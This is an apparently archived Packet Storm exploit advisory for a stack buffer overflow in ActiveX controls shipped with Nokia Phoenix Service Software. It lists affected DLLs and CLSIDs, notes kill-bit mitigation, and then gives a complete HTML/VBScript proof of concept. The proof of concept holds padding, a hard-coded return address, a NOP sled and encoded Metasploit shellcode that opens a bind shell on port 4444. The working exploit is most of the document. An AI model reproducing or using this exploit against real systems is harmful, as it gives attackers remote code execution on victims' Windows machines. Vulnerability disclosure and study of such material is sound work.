Nokia Phoenix Buffer Overflow

2009-02-09T00:00:00
ID PACKETSTORM:74769
Type packetstorm
Reporter MurderSkillz
Modified 2009-02-09T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------------------------------------------  
BOF discovered and written by MurderSkillz  
------------------------------------------------------------------------------------------------------------  
Description:  
Company Name and Website  
Nokia  
www.Nokia.com  
  
Software that ships the vulnerable DLLs:  
Nokia Phoenix Service Software 2008.04.007.32837   
  
This software is used for flashing nokia cellphones and maintenance.  
Other versions of this software were not tested, but are likely vulnerable if they ship the same DLL versions (file version 1.0.0.0 of the two controls listed below).  
  
Vulnerable DLLs: cmnsignalanalyzerfn.dll {F85B4A10-B530-4D68-A714-7415838FD174}  
& cmnsignalgeneratorfn.dll {929A0D77-044A-497F-8FDF-8EDE81F6251A}  
Both file versions are: 1.0.0.0  
(The PoC below instantiates only the first CLSID, the signal-analyzer control; the generator control is listed as affected but is not exercised by this page.)  
  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
KillBitSet: False  
Reviewer note: the control is not marked safe for scripting or initialization, so Internet Explorer with default Internet-zone settings will not script it from a web page without prompting; reaching the vulnerable method from a remote page therefore needs a more permissive zone or user consent. No kill bit is set, so setting the kill bit (Compatibility Flags) on both CLSIDs above is the usual interim mitigation until the vendor fixes the controls.  
  
The POC was tested on Windows XP Pro SP3 w/ Internet Explorer 7 - All patched  
Also Windows XP Pro SP2 w/ Internet Explorer 7  
  
By the way, props go out to shinnai for his tool, Roadmap.  
Major thanks go out to HD Moore and the Metasploit project/crew =) www.metasploit.com  
Thanks sCORPINo =P www.snoop-security.com  
  
The author of this POC is not responsible for any stupid shit you do with it =)  
------------------------------------------------------------------------------------------------------------  
<html>  
<!-- PoC: stack buffer overflow in the SelectDevice method of the cmnsignalanalyzerfn.dll
     ActiveX control (CLSID below). Only this CLSID is instantiated; the signal-generator
     control named in the advisory is not exercised by this page. -->
<object classid='clsid:F85B4A10-B530-4D68-A714-7415838FD174' id='Fucker'></object>  
<script language = 'vbscript'>  
' Padding: 370 bytes of "A" reach the saved return address, i.e. the saved EIP
' is overwritten at offset 370 (see the buffer concatenation at the bottom).
junk = String(370, "A")  
  
' Return address, written little-endian: bytes 53 49 48 7E -> 0x7E484953.
' The author's note says this is a "call esp" in user32.dll on XP Pro SP3 / IE7.
' NOTE(review): the advisory also claims SP2 was tested, but user32.dll differs
' between service packs -- confirm this address on SP2 before relying on it.
' The hard-coded address is what ties this PoC to one OS / service-pack build.
EIP = unescape("%53%49%48%7E") 'call esp from user32.dll XpPro Sp3/IE7  
  
' 12-byte NOP sled sitting where ESP points after the return, so the
' "call esp" gadget lands in it and slides into the payload.
nop = String(12, unescape("%90"))  
  
' Payload generated by Metasploit (banner below): win32_bind, a bind shell
' listening on TCP port 4444, 696 bytes, Alpha2 (alphanumeric) encoded --
' presumably so it survives any character filtering on the string path.
' EXITFUNC=seh: the payload exits via an SEH fault rather than a clean return.
<!-- win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com -->  
  
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49")  
shellcode=shellcode+unescape("%49%49%37%49%49%49%49%49%49%49%49%49%51%5a%6a%67")  
shellcode=shellcode+unescape("%58%30%42%31%50%41%42%6b%42%41%77%32%42%42%32%41")  
shellcode=shellcode+unescape("%41%30%41%41%42%58%38%42%42%50%75%6b%59%39%6c%50")  
shellcode=shellcode+unescape("%6a%7a%4b%70%4d%6d%38%4b%49%6b%4f%59%6f%69%6f%31")  
shellcode=shellcode+unescape("%70%4e%6b%72%4c%51%34%56%44%4e%6b%30%45%57%4c%4c")  
shellcode=shellcode+unescape("%4b%33%4c%57%75%53%48%45%51%68%6f%6e%6b%32%6f%52")  
shellcode=shellcode+unescape("%38%4e%6b%53%6f%61%30%45%51%5a%4b%42%69%4e%6b%56")  
shellcode=shellcode+unescape("%54%4e%6b%47%71%78%6e%45%61%4b%70%6f%69%4c%6c%6d")  
shellcode=shellcode+unescape("%54%6f%30%71%64%65%57%58%41%68%4a%76%6d%35%51%6b")  
shellcode=shellcode+unescape("%72%78%6b%6c%34%75%6b%73%64%75%74%75%78%51%65%49")  
shellcode=shellcode+unescape("%75%6e%6b%51%4f%36%44%57%71%5a%4b%70%66%6e%6b%34")  
shellcode=shellcode+unescape("%4c%30%4b%6c%4b%73%6f%47%6c%65%51%4a%4b%73%33%64")  
shellcode=shellcode+unescape("%6c%4e%6b%4b%39%70%6c%31%34%77%6c%75%31%69%53%65")  
shellcode=shellcode+unescape("%61%49%4b%52%44%6e%6b%32%63%36%50%6e%6b%33%70%74")  
shellcode=shellcode+unescape("%4c%6c%4b%74%30%45%4c%4c%6d%6e%6b%77%30%57%78%61")  
shellcode=shellcode+unescape("%4e%73%58%6c%4e%50%4e%36%6e%38%6c%56%30%79%6f%38")  
shellcode=shellcode+unescape("%56%55%36%72%73%65%36%30%68%44%73%34%72%65%38%42")  
shellcode=shellcode+unescape("%57%53%43%77%42%61%4f%31%44%6b%4f%6e%30%45%38%4a")  
shellcode=shellcode+unescape("%6b%48%6d%4b%4c%77%4b%46%30%69%6f%4a%76%61%4f%4b")  
shellcode=shellcode+unescape("%39%6b%55%62%46%4b%31%48%6d%75%58%76%62%43%65%73")  
shellcode=shellcode+unescape("%5a%35%52%6b%4f%4e%30%55%38%6e%39%65%59%6b%45%6e")  
shellcode=shellcode+unescape("%4d%62%77%4b%4f%69%46%51%43%46%33%71%43%52%73%63")  
shellcode=shellcode+unescape("%63%43%73%30%53%70%43%61%43%59%6f%6e%30%72%46%75")  
shellcode=shellcode+unescape("%38%52%31%71%4c%33%56%43%63%6d%59%59%71%6c%55%72")  
shellcode=shellcode+unescape("%48%6f%54%66%7a%70%70%4b%77%50%57%4b%4f%4b%66%63")  
shellcode=shellcode+unescape("%5a%36%70%71%41%50%55%4b%4f%4e%30%61%78%4f%54%4c")  
shellcode=shellcode+unescape("%6d%56%4e%69%79%52%77%6b%4f%5a%76%36%33%43%65%59")  
shellcode=shellcode+unescape("%6f%5a%70%45%38%6a%45%30%49%6c%46%57%39%72%77%59")  
shellcode=shellcode+unescape("%6f%7a%76%50%50%71%44%70%54%52%75%39%6f%58%50%6e")  
shellcode=shellcode+unescape("%73%42%48%4b%57%71%69%38%46%33%49%41%47%39%6f%49")  
shellcode=shellcode+unescape("%46%30%55%49%6f%4a%70%50%66%61%7a%31%74%43%56%52")  
shellcode=shellcode+unescape("%48%75%33%62%4d%6c%49%49%75%71%7a%42%70%50%59%54")  
shellcode=shellcode+unescape("%69%4a%6c%4c%49%39%77%42%4a%57%34%4b%39%69%72%65")  
shellcode=shellcode+unescape("%61%4b%70%58%73%6d%7a%6b%4e%50%42%76%4d%6b%4e%50")  
shellcode=shellcode+unescape("%42%76%4c%4d%43%6e%6d%73%4a%65%68%6e%4b%6e%4b%4c")  
shellcode=shellcode+unescape("%6b%71%78%32%52%6b%4e%4f%43%34%56%69%6f%72%55%32")  
shellcode=shellcode+unescape("%64%49%6f%7a%76%43%6b%56%37%56%32%70%51%30%51%32")  
shellcode=shellcode+unescape("%71%43%5a%37%71%41%41%73%61%63%65%66%31%4b%4f%5a")  
shellcode=shellcode+unescape("%70%70%68%6e%4d%79%49%73%35%5a%6e%61%43%49%6f%58")  
shellcode=shellcode+unescape("%56%50%6a%49%6f%59%6f%64%77%59%6f%58%50%4c%4b%32")  
shellcode=shellcode+unescape("%77%6b%4c%4e%63%48%44%63%54%6b%4f%4e%36%46%32%69")  
shellcode=shellcode+unescape("%6f%38%50%51%78%78%70%4f%7a%76%64%31%4f%63%63%69")  
shellcode=shellcode+unescape("%6f%4b%66%6b%4f%68%50%67")  
  
' Final buffer layout: 370 (padding) + 4 (EIP) + 12 (NOP sled) + 696 (shellcode) bytes.
NokiaFucker = junk + EIP + nop + shellcode  
  
' Trigger: the oversized string is passed as the first argument of SelectDevice.
' The EIP overwrite at offset 370 implies the control copies this argument into a
' fixed-size stack buffer without a length check; the copy site itself is not
' visible here and the second (empty) argument is presumably irrelevant to the bug.
Fucker.SelectDevice NokiaFucker,""  
</script>  
</html>`